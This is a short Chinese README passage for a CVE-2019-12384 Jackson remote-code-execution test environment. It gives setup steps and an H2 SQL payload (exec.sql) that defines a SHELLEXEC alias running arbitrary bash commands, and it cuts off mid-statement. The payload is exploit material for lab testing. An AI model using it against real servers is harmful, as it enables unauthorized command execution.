Jackson_RCE-CVE-2019-12384:CVE-2019-12384 漏洞测试环境

环境搭建 将项目导入到idea，再配置好maven之后设置自动导入依赖库，然后在本地的web空目录写入如下文件，保存为exec.sql。并启动一个http server： CREATE ALIAS SHELLEXEC AS $$ String shellexec(String cmd) throws java.io.IOException { String[] command = {"/bin/bash", "-c", cmd}; java.util.Scanner s = new java.util.Scanner(Runtime.getRuntime().exec(command).getInputStream()).useDelimiter("\0A"); return s.hasNext() ? s.next() : ""; } $$; CALL SHEL